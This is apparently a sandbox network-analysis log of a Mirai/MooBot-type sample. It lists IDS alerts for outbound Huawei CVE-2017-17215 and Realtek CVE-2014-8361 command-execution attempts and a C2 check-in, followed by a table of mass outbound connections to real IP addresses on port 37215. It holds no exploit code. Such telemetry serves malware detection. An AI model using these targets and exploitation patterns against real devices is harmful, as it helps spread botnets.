                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4171052869192.168.2.14198.163.171.175
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955037215192.168.2.14157.83.28.229
                                                2024-07-20T23:05:38.970943+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084837215192.168.2.14157.186.3.226
                                                2024-07-20T23:05:33.870658+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699037215192.168.2.14197.153.130.241
                                                2024-07-20T23:05:33.872953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932037215192.168.2.1491.98.242.170
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3595452869192.168.2.14117.129.252.99
                                                2024-07-20T23:05:34.673459+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809437215192.168.2.14157.153.180.139
                                                2024-07-20T23:05:33.862080+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230637215192.168.2.14166.16.190.83
                                                2024-07-20T23:05:36.354743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523037215192.168.2.14212.102.177.184
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5383652869192.168.2.14191.30.146.121
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831237215192.168.2.1432.2.223.204
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3741252869192.168.2.14200.98.155.108
                                                2024-07-20T23:05:45.492662+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052637215192.168.2.14177.224.66.232
                                                2024-07-20T23:05:37.664967+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912452869192.168.2.14150.186.198.246
                                                2024-07-20T23:05:40.474238+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3933452869192.168.2.1487.25.55.60
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949237215192.168.2.14157.208.177.172
                                                2024-07-20T23:05:36.354373+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868437215192.168.2.14157.66.61.45
                                                2024-07-20T23:05:37.534770+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5375052869192.168.2.1437.150.102.99
                                                2024-07-20T23:05:33.866516+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390637215192.168.2.14197.187.231.237
                                                2024-07-20T23:05:34.676834+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555037215192.168.2.14157.38.118.86
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925037215192.168.2.14115.17.56.208
                                                2024-07-20T23:05:40.427267+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4750652869192.168.2.14190.0.225.28
                                                2024-07-20T23:05:34.678246+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251837215192.168.2.14197.49.145.149
                                                2024-07-20T23:05:36.346416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159437215192.168.2.1441.57.89.122
                                                2024-07-20T23:05:36.342361+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618037215192.168.2.14125.15.129.89
                                                2024-07-20T23:05:39.158428+0200TCP2030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)431302466192.168.2.1415.235.203.214
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5546652869192.168.2.14121.248.9.74
                                                2024-07-20T23:05:33.863434+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021837215192.168.2.14197.207.102.189
                                                2024-07-20T23:05:35.950141+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5024252869192.168.2.14185.138.94.75
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333237215192.168.2.1441.7.174.17
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942237215192.168.2.14157.42.88.138
                                                2024-07-20T23:05:36.340522+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531237215192.168.2.14197.113.213.112
                                                2024-07-20T23:05:33.868951+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630037215192.168.2.14157.14.16.110
                                                2024-07-20T23:05:37.613649+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4144052869192.168.2.1481.143.140.223
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952437215192.168.2.14157.252.199.36
                                                2024-07-20T23:05:34.673041+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644437215192.168.2.1450.34.155.192
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083237215192.168.2.14197.182.192.84
                                                2024-07-20T23:05:36.346416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083837215192.168.2.14197.125.103.179
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5840852869192.168.2.14102.124.228.209
                                                2024-07-20T23:05:36.352367+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021237215192.168.2.14197.163.146.52
                                                2024-07-20T23:05:33.871918+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752237215192.168.2.14197.125.116.0
                                                2024-07-20T23:05:37.675714+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4703652869192.168.2.14211.173.154.125
                                                2024-07-20T23:05:37.803904+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3833852869192.168.2.14208.117.82.120
                                                2024-07-20T23:05:36.354140+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029237215192.168.2.14197.131.149.155
                                                2024-07-20T23:05:36.550808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672237215192.168.2.14157.110.219.252
                                                2024-07-20T23:05:46.358513+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5719452869192.168.2.1460.143.208.198
                                                2024-07-20T23:05:37.606405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4650852869192.168.2.14131.209.58.23
                                                2024-07-20T23:05:36.363294+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498237215192.168.2.1441.134.46.102
                                                2024-07-20T23:05:36.619355+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334637215192.168.2.14211.106.125.212
                                                2024-07-20T23:05:34.670904+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998037215192.168.2.14197.21.229.2
                                                2024-07-20T23:05:36.332387+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099837215192.168.2.14157.116.93.101
                                                2024-07-20T23:05:36.359675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914437215192.168.2.1441.62.12.100
                                                2024-07-20T23:05:36.352367+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801437215192.168.2.14157.173.110.253
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896037215192.168.2.14157.182.60.47
                                                2024-07-20T23:05:36.346416+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752637215192.168.2.14197.65.82.249
                                                2024-07-20T23:05:37.685966+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5751652869192.168.2.1451.156.162.59
                                                2024-07-20T23:05:37.695781+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5906252869192.168.2.14119.225.48.58
                                                2024-07-20T23:05:34.682964+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270837215192.168.2.14130.150.233.95
                                                2024-07-20T23:05:36.354743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358037215192.168.2.1479.106.105.235
                                                2024-07-20T23:05:36.363294+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302037215192.168.2.14197.32.40.48
                                                2024-07-20T23:05:36.359785+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289037215192.168.2.14157.92.9.122
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558237215192.168.2.14157.185.198.1
                                                2024-07-20T23:05:36.343632+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935437215192.168.2.1441.52.157.191
                                                2024-07-20T23:05:37.485425+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3573252869192.168.2.1417.92.216.196
                                                2024-07-20T23:05:40.475273+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3744052869192.168.2.14136.196.140.175
                                                2024-07-20T23:05:36.356816+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308037215192.168.2.14157.19.208.204
                                                2024-07-20T23:05:37.632661+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6030652869192.168.2.1493.244.188.64
                                                2024-07-20T23:05:34.678246+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610037215192.168.2.14157.175.25.122
                                                2024-07-20T23:05:34.676145+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848437215192.168.2.14151.249.104.249
                                                2024-07-20T23:05:34.680576+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5312037215192.168.2.1441.14.60.190
                                                2024-07-20T23:05:37.656252+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4838052869192.168.2.14216.17.47.144
                                                2024-07-20T23:05:33.872982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458637215192.168.2.14155.178.232.143
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884637215192.168.2.1425.142.145.178
                                                2024-07-20T23:05:36.354743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809837215192.168.2.14157.231.34.207
                                                2024-07-20T23:05:37.591367+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3794052869192.168.2.1443.119.39.158
                                                2024-07-20T23:05:37.645873+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4151452869192.168.2.14100.147.99.239
                                                2024-07-20T23:05:40.493410+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3430452869192.168.2.14204.155.193.18
                                                2024-07-20T23:05:34.676145+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184437215192.168.2.14183.188.212.130
                                                2024-07-20T23:05:36.338393+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299037215192.168.2.14197.156.215.136
                                                2024-07-20T23:05:36.332244+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933237215192.168.2.1441.176.244.105
                                                2024-07-20T23:05:33.865440+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.14157.25.209.247
                                                2024-07-20T23:05:34.674515+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4475437215192.168.2.14167.133.59.154
                                                2024-07-20T23:05:36.354743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708437215192.168.2.14197.158.187.122
                                                2024-07-20T23:05:33.870658+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357437215192.168.2.14157.42.169.126
                                                2024-07-20T23:05:34.663519+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446037215192.168.2.14197.183.189.239
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 20, 2024 23:05:31.955507040 CEST2645437215192.168.2.14197.164.78.122
                                                Jul 20, 2024 23:05:31.955507994 CEST2645437215192.168.2.14197.70.47.135
                                                Jul 20, 2024 23:05:31.955523014 CEST2645437215192.168.2.1431.226.75.152
                                                Jul 20, 2024 23:05:31.955528021 CEST2645437215192.168.2.14197.57.175.45
                                                Jul 20, 2024 23:05:31.955528975 CEST2645437215192.168.2.14186.23.77.122
                                                Jul 20, 2024 23:05:31.955540895 CEST2645437215192.168.2.14197.112.26.200
                                                Jul 20, 2024 23:05:31.955540895 CEST2645437215192.168.2.14157.244.153.74
                                                Jul 20, 2024 23:05:31.955557108 CEST2645437215192.168.2.14197.23.105.2
                                                Jul 20, 2024 23:05:31.955557108 CEST2645437215192.168.2.1475.49.195.139
                                                Jul 20, 2024 23:05:31.955580950 CEST2645437215192.168.2.14197.206.89.130
                                                Jul 20, 2024 23:05:31.955584049 CEST2645437215192.168.2.14157.183.110.42
                                                Jul 20, 2024 23:05:31.955584049 CEST2645437215192.168.2.1491.98.242.170
                                                Jul 20, 2024 23:05:31.955588102 CEST2645437215192.168.2.14157.153.42.4
                                                Jul 20, 2024 23:05:31.955600023 CEST2645437215192.168.2.14120.191.233.247
                                                Jul 20, 2024 23:05:31.955610991 CEST2645437215192.168.2.14197.48.133.159
                                                Jul 20, 2024 23:05:31.955614090 CEST2645437215192.168.2.14157.42.169.126
                                                Jul 20, 2024 23:05:31.955614090 CEST2645437215192.168.2.1441.185.62.167
                                                Jul 20, 2024 23:05:31.955631971 CEST2645437215192.168.2.14157.233.53.190
                                                Jul 20, 2024 23:05:31.955634117 CEST2645437215192.168.2.14141.199.59.173
                                                Jul 20, 2024 23:05:31.955636978 CEST2645437215192.168.2.1441.156.206.214
                                                Jul 20, 2024 23:05:31.955636978 CEST2645437215192.168.2.14211.45.136.152
                                                Jul 20, 2024 23:05:31.955636978 CEST2645437215192.168.2.14197.164.23.3
                                                Jul 20, 2024 23:05:31.955641985 CEST2645437215192.168.2.14181.89.181.103
                                                Jul 20, 2024 23:05:31.955693960 CEST2645437215192.168.2.14157.184.79.183
                                                Jul 20, 2024 23:05:31.955698013 CEST2645437215192.168.2.14197.209.199.16
                                                Jul 20, 2024 23:05:31.955701113 CEST2645437215192.168.2.14197.52.105.112
                                                Jul 20, 2024 23:05:31.955703020 CEST2645437215192.168.2.14157.22.107.208
                                                Jul 20, 2024 23:05:31.955703020 CEST2645437215192.168.2.1441.165.255.30
                                                Jul 20, 2024 23:05:31.955704927 CEST2645437215192.168.2.14157.14.174.37
                                                Jul 20, 2024 23:05:31.955704927 CEST2645437215192.168.2.1441.28.13.220
                                                Jul 20, 2024 23:05:31.955734015 CEST2645437215192.168.2.1441.122.250.164
                                                Jul 20, 2024 23:05:31.955744028 CEST2645437215192.168.2.1441.93.186.26
                                                Jul 20, 2024 23:05:31.955744982 CEST2645437215192.168.2.14157.176.218.10
                                                Jul 20, 2024 23:05:31.955758095 CEST2645437215192.168.2.14197.219.134.66
                                                Jul 20, 2024 23:05:31.955766916 CEST2645437215192.168.2.14197.38.240.133
                                                Jul 20, 2024 23:05:31.955779076 CEST2645437215192.168.2.14157.33.158.151
                                                Jul 20, 2024 23:05:31.955787897 CEST2645437215192.168.2.1424.82.183.93
                                                Jul 20, 2024 23:05:31.955790997 CEST2645437215192.168.2.14157.183.5.146
                                                Jul 20, 2024 23:05:31.955790997 CEST2645437215192.168.2.1441.248.125.74
                                                Jul 20, 2024 23:05:31.955790997 CEST2645437215192.168.2.14157.58.89.166
                                                Jul 20, 2024 23:05:31.955804110 CEST2645437215192.168.2.1441.247.46.12
                                                Jul 20, 2024 23:05:31.955804110 CEST2645437215192.168.2.1441.248.234.133
                                                Jul 20, 2024 23:05:31.955805063 CEST2645437215192.168.2.14197.152.207.21
                                                Jul 20, 2024 23:05:31.955805063 CEST2645437215192.168.2.14197.50.11.183
                                                Jul 20, 2024 23:05:31.955852985 CEST2645437215192.168.2.14133.28.220.100
                                                Jul 20, 2024 23:05:31.955852985 CEST2645437215192.168.2.1441.70.140.218
                                                Jul 20, 2024 23:05:31.955878973 CEST2645437215192.168.2.14157.198.219.2
                                                Jul 20, 2024 23:05:31.955878973 CEST2645437215192.168.2.14152.41.190.171
                                                Jul 20, 2024 23:05:31.955878973 CEST2645437215192.168.2.1494.44.111.34
                                                Jul 20, 2024 23:05:31.955893040 CEST2645437215192.168.2.1441.146.165.184
                                                Jul 20, 2024 23:05:31.955895901 CEST2645437215192.168.2.14197.153.130.241
                                                Jul 20, 2024 23:05:31.955908060 CEST2645437215192.168.2.14157.148.29.80
                                                Jul 20, 2024 23:05:31.955908060 CEST2645437215192.168.2.1441.189.66.95
                                                Jul 20, 2024 23:05:31.955910921 CEST2645437215192.168.2.14197.187.231.237
                                                Jul 20, 2024 23:05:31.955915928 CEST2645437215192.168.2.14157.18.39.4
                                                Jul 20, 2024 23:05:31.955915928 CEST2645437215192.168.2.1418.5.132.170
                                                Jul 20, 2024 23:05:31.955916882 CEST2645437215192.168.2.14157.182.246.174
                                                Jul 20, 2024 23:05:31.955960989 CEST2645437215192.168.2.14197.90.229.28
                                                Jul 20, 2024 23:05:31.955960989 CEST2645437215192.168.2.14197.125.116.0
                                                Jul 20, 2024 23:05:31.955960989 CEST2645437215192.168.2.14157.96.246.174
                                                Jul 20, 2024 23:05:31.955960989 CEST2645437215192.168.2.14157.124.133.127
                                                Jul 20, 2024 23:05:31.955965042 CEST2645437215192.168.2.14157.208.177.172
                                                Jul 20, 2024 23:05:31.955965042 CEST2645437215192.168.2.14157.194.67.142
                                                Jul 20, 2024 23:05:31.955965042 CEST2645437215192.168.2.14157.204.130.3
                                                Jul 20, 2024 23:05:31.955986023 CEST2645437215192.168.2.14128.4.57.232
                                                Jul 20, 2024 23:05:31.956017017 CEST2645437215192.168.2.14138.194.165.219
                                                Jul 20, 2024 23:05:31.956017017 CEST2645437215192.168.2.14157.157.49.65
                                                Jul 20, 2024 23:05:31.956037998 CEST2645437215192.168.2.14155.178.232.143
                                                Jul 20, 2024 23:05:31.956037998 CEST2645437215192.168.2.14197.223.52.137
                                                Jul 20, 2024 23:05:31.956054926 CEST2645437215192.168.2.14198.80.229.185
                                                Jul 20, 2024 23:05:31.956079960 CEST2645437215192.168.2.14157.62.62.113
                                                Jul 20, 2024 23:05:31.956079960 CEST2645437215192.168.2.14157.25.209.247
                                                Jul 20, 2024 23:05:31.956079960 CEST2645437215192.168.2.14157.14.16.110
                                                Jul 20, 2024 23:05:31.956084013 CEST2645437215192.168.2.14157.32.82.175
                                                Jul 20, 2024 23:05:31.956085920 CEST2645437215192.168.2.14176.171.193.242
                                                Jul 20, 2024 23:05:31.956085920 CEST2645437215192.168.2.14157.104.80.16
                                                Jul 20, 2024 23:05:31.956089020 CEST2645437215192.168.2.14157.83.28.229
                                                Jul 20, 2024 23:05:31.956110001 CEST2645437215192.168.2.14157.145.195.153
                                                Jul 20, 2024 23:05:31.956119061 CEST2645437215192.168.2.1441.21.217.171
                                                Jul 20, 2024 23:05:31.956125975 CEST2645437215192.168.2.1441.112.53.44
                                                Jul 20, 2024 23:05:31.956127882 CEST2645437215192.168.2.14197.207.102.189
                                                Jul 20, 2024 23:05:31.956132889 CEST2645437215192.168.2.14157.68.215.138
                                                Jul 20, 2024 23:05:31.956152916 CEST2645437215192.168.2.14197.40.168.196
                                                Jul 20, 2024 23:05:31.956156015 CEST2645437215192.168.2.1441.46.124.193
                                                Jul 20, 2024 23:05:31.956170082 CEST2645437215192.168.2.14197.88.18.67
                                                Jul 20, 2024 23:05:31.956171989 CEST2645437215192.168.2.14157.180.0.116
                                                Jul 20, 2024 23:05:31.956185102 CEST2645437215192.168.2.14157.221.39.140
                                                Jul 20, 2024 23:05:31.956207991 CEST2645437215192.168.2.14197.163.62.174
                                                Jul 20, 2024 23:05:31.956231117 CEST2645437215192.168.2.1441.212.142.21
                                                Jul 20, 2024 23:05:31.956231117 CEST2645437215192.168.2.14204.22.161.228
                                                Jul 20, 2024 23:05:31.956238985 CEST2645437215192.168.2.14197.237.152.228
                                                Jul 20, 2024 23:05:31.956238985 CEST2645437215192.168.2.14157.170.165.170
                                                Jul 20, 2024 23:05:31.956238985 CEST2645437215192.168.2.14157.240.34.42
                                                Jul 20, 2024 23:05:31.956244946 CEST2645437215192.168.2.1441.209.69.235
                                                Jul 20, 2024 23:05:31.956244946 CEST2645437215192.168.2.1441.133.29.67
                                                Jul 20, 2024 23:05:31.956244946 CEST2645437215192.168.2.14131.78.104.9
                                                Jul 20, 2024 23:05:31.956290007 CEST2645437215192.168.2.14211.147.140.76
                                                Jul 20, 2024 23:05:31.956290007 CEST2645437215192.168.2.14197.157.247.234
                                                Jul 20, 2024 23:05:31.956346989 CEST2645437215192.168.2.1441.135.32.84
                                                Jul 20, 2024 23:05:31.956384897 CEST2645437215192.168.2.14157.196.44.133
                                                Jul 20, 2024 23:05:31.956384897 CEST2645437215192.168.2.14110.124.171.180
                                                Jul 20, 2024 23:05:31.956384897 CEST2645437215192.168.2.1476.174.76.195
                                                Jul 20, 2024 23:05:31.956384897 CEST2645437215192.168.2.14174.135.199.129
                                                Jul 20, 2024 23:05:31.956402063 CEST2645437215192.168.2.1441.165.208.89
                                                Jul 20, 2024 23:05:31.956419945 CEST2645437215192.168.2.14157.55.227.62
                                                Jul 20, 2024 23:05:31.956420898 CEST2645437215192.168.2.14158.245.1.223
                                                Jul 20, 2024 23:05:31.956420898 CEST2645437215192.168.2.14204.65.167.10
                                                Jul 20, 2024 23:05:31.956422091 CEST2645437215192.168.2.14197.135.151.92
                                                Jul 20, 2024 23:05:31.956422091 CEST2645437215192.168.2.14166.16.190.83
                                                Jul 20, 2024 23:05:31.956463099 CEST2645437215192.168.2.14197.148.145.109
                                                Jul 20, 2024 23:05:31.956479073 CEST2645437215192.168.2.14197.237.160.210
                                                Jul 20, 2024 23:05:31.956479073 CEST2645437215192.168.2.14125.218.223.230
                                                Jul 20, 2024 23:05:31.956612110 CEST2645437215192.168.2.14157.248.11.159
                                                Jul 20, 2024 23:05:31.956612110 CEST2645437215192.168.2.14185.101.34.75
                                                Jul 20, 2024 23:05:31.956624985 CEST2645437215192.168.2.1441.103.45.78
                                                Jul 20, 2024 23:05:31.956624985 CEST2645437215192.168.2.14157.129.24.89
                                                Jul 20, 2024 23:05:31.956624985 CEST2645437215192.168.2.14157.183.228.205
                                                Jul 20, 2024 23:05:31.956624985 CEST2645437215192.168.2.1492.57.180.103
                                                Jul 20, 2024 23:05:31.956698895 CEST2645437215192.168.2.14189.228.237.19
                                                Jul 20, 2024 23:05:31.956717968 CEST2645437215192.168.2.14197.220.34.254
                                                Jul 20, 2024 23:05:31.956718922 CEST2645437215192.168.2.14121.209.116.212
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.1441.142.55.170
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.14157.153.180.139
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.14157.130.208.54
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.14157.98.20.252
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.14197.152.249.5
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.14106.240.47.148
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.14157.37.121.244
                                                Jul 20, 2024 23:05:31.956737041 CEST2645437215192.168.2.14157.38.20.146
                                                Jul 20, 2024 23:05:31.956756115 CEST2645437215192.168.2.14157.76.189.3
                                                Jul 20, 2024 23:05:31.956756115 CEST2645437215192.168.2.1497.117.94.92
                                                Jul 20, 2024 23:05:31.956756115 CEST2645437215192.168.2.1491.134.129.146
                                                Jul 20, 2024 23:05:31.956756115 CEST2645437215192.168.2.1441.179.93.180
                                                Jul 20, 2024 23:05:31.956756115 CEST2645437215192.168.2.1441.124.78.80
                                                Jul 20, 2024 23:05:31.956756115 CEST2645437215192.168.2.1475.163.132.69
                                                Jul 20, 2024 23:05:31.956799984 CEST2645437215192.168.2.14157.155.124.136
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.1478.116.111.6
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.14197.94.74.21
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.14197.160.70.240
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.1441.19.68.136
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.1441.51.127.171
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.14197.49.145.149
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.14130.150.233.95
                                                Jul 20, 2024 23:05:31.956825972 CEST2645437215192.168.2.1441.155.35.213
                                                Jul 20, 2024 23:05:31.956907034 CEST2645437215192.168.2.14216.204.37.61
                                                Jul 20, 2024 23:05:31.956907034 CEST2645437215192.168.2.14197.178.185.152
                                                Jul 20, 2024 23:05:31.956957102 CEST2645437215192.168.2.14197.48.219.131
                                                Jul 20, 2024 23:05:31.956958055 CEST2645437215192.168.2.14197.170.178.75
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.14155.221.192.136
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.14197.190.87.107
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.141.160.229.40
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.1434.202.46.128
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.1445.182.212.164
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.14221.229.167.177
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.14157.28.53.140
                                                Jul 20, 2024 23:05:31.957006931 CEST2645437215192.168.2.1441.219.3.184
                                                Jul 20, 2024 23:05:31.957084894 CEST2645437215192.168.2.14197.86.55.32
                                                Jul 20, 2024 23:05:31.957084894 CEST2645437215192.168.2.1441.205.179.211
                                                Jul 20, 2024 23:05:31.957084894 CEST2645437215192.168.2.1441.141.203.96
                                                Jul 20, 2024 23:05:31.957084894 CEST2645437215192.168.2.14157.12.154.103
                                                Jul 20, 2024 23:05:31.957086086 CEST2645437215192.168.2.1464.130.174.77
                                                Jul 20, 2024 23:05:31.957115889 CEST2645437215192.168.2.14164.152.114.92
                                                Jul 20, 2024 23:05:31.957117081 CEST2645437215192.168.2.14197.164.107.109
                                                Jul 20, 2024 23:05:31.957117081 CEST2645437215192.168.2.1441.14.60.190
                                                Jul 20, 2024 23:05:31.957117081 CEST2645437215192.168.2.14157.76.186.37
